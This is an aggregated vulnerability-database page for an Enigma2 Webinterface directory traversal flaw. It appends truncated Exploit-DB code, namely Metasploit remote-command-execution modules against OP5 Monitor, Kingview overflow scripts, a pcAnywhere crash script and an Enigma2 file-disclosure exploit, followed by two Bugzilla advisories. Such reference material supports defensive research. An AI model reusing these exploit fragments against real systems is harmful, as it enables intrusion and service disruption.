CVE-2012-1024
Published: 2012-02-08
Priority: P4
CVSS 2.0: 5 (medium), vector AV:N/AC:L/Au:N/C:P/I:N/A:N
EPSS: 3.64% (88.1th percentile)
Directory traversal vulnerability in file in Enigma2 Webinterface 1.5rc1 and 1.5beta4 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dream-multimedia-tv | enigma2_webinterface | — | — |
No detection rules found.
Exploit-DB
CVE-2012-0261 OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'license.php' Remote Command Execution (Metasploit)
exploitdb·2015-01-25
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OP5 license.php Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary root command execution vulnerability in the
        OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,
        5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
      },
      'Author'      => [ 'Peter Osterberg ' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2012-0261'],
          ['OSVDB', '78064'],
          ['URL', 'http://secunia.com/advisories/47417/'],
        ],
      'Privileged'  => true,
      'Payload'     =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'BadCh
```
Exploit-DB
CVE-2012-0262 OP5 5.3.5/5.4.0/5.4.2/5.5.0/5.5.1 - 'welcome' Remote Command Execution (Metasploit)
exploitdb·2015-01-05
---
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'OP5 welcome Remote Command Execution',
      'Description' => %q{
        This module exploits an arbitrary root command execution vulnerability in
        OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5,
        5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.
      },
      'Author'      => [ 'Peter Osterberg ' ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2012-0262'],
          ['OSVDB', '78065'],
          ['URL', 'http://secunia.com/advisories/47417/'],
        ],
      'Privileged'  => true,
      'Payload'     =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'BadChars'    => '`\\|
```
Exploit-DB
CVE-2012-1830 Kingview Touchview 6.53 - EIP Overwrite
exploitdb·2012-06-25
---
```python
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
#
# Open Kingview, click on Make, choose network configuration ---> network
# parameter, then go to the node type and choose Local is a Login Server,
# run the demo and port 555 will be open.
#
# NOTE:
# This was already patched by the vendor silently.
import os
import socket
import sys

host = "10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,por
```
Exploit-DB
CVE-2012-1831 Kingview Touchview 6.53 - Multiple Heap Overflow Vulnerabilities
exploitdb·2012-06-25
---
```python
# Exploit Title: Kingview 6.53 touchview.exe heap overflow 2
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
#
# Open Kingview, click on Make, choose network configuration ---> network
# parameter, then go to the node type and choose Local is a Login Server,
# run the demo and port 555 will be open.
#
# NOTE:
# This was already patched by the vendor silently.
import os
import socket
import sys

host = "10.0.2.15"
port = 555
exploit = ("D"*70000)
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host,port))
s2.send(exploit)
data = s2.recv(1024)
s2.close()
```
eax=42424242 ebx=00140000 ecx=0098ffff edx=00990000 esi=0014074
Exploit-DB
CVE-2012-0292 pcAnywhere 12.5.0 build 463 - Denial of Service
exploitdb·2012-02-17
---
```python
#!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my initial impressions
are that controlling execution will be a pain.
'''
import sys
import socket
import argparse

if len(sys.argv) != 2:
    print "[+] Usage: ./pcNuke.py "
    sys.exit(1)

HOST = sys.argv[1]
PORT = 5631
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)
# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024
```
Exploit-DB
CVE-2012-1025 Enigma2 Webinterface 1.5.x/1.6.x/1.7.x (Linux) - Remote File Disclosure
exploitdb·2012-01-09
---
```perl
#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
##
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
##
# Gewgle Dork: "Enigma2 movielist" filetype:rss
##
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
##
# Thanks to Tsvetelina Emirska !!
##
use LWP::Simple;
$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(!
```
Bugzilla
CVE-2012-6687 [MEDIUM] fcgi: numerous connections cause segfault DoS
bugzilla·2015-02-06·CVSS 5.0
FCGI does not perform range checks for file descriptors before use of the FD_SET macro. This FD_SET macro could allow for more than 1024 total file descriptors to be monitored in the closing state.
This may allow remote attackers to cause a denial of service (stack memory corruption, and infinite loop or daemon crash) by opening many socket connections to the host and crashing the service.
External references:
https://bugs.launchpad.net/ubuntu/+source/libfcgi/+bug/933417
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=681591
Upstream patches:
At this time the fcgi mailing list is down, this seems to be the patch that is chosen:
https://launchpadlibrarian.net/93064712/poll.patch
Discussion:
link to CVE request: http://www
Bugzilla
CVE-2012-0477 [MEDIUM] Mozilla: Potential XSS through ISO-2022-KR/ISO-2022-CN decoding issues (MFSA 2012-29)
bugzilla·2012-04-22·CVSS 4.3
Security researcher Masato Kinugawa found that during the decoding of ISO-2022-KR and ISO-2022-CN character sets, characters near 1024 bytes are treated incorrectly, either doubling or deleting bytes. On certain pages it might be possible for an attacker to pad the output of the page such that these errors fall in the right place to affect the structure of the page, allowing for cross-site script (XSS) injection.
Reference:
http://www.mozilla.org/security/announce/2012/mfsa2012-29.html
Discussion:
Acknowledgements:
Red Hat would like to thank the Mozilla project for reporting this issue. Upstream acknowledges Masato Kinugawa as the original reporter.
---
This issue has been addressed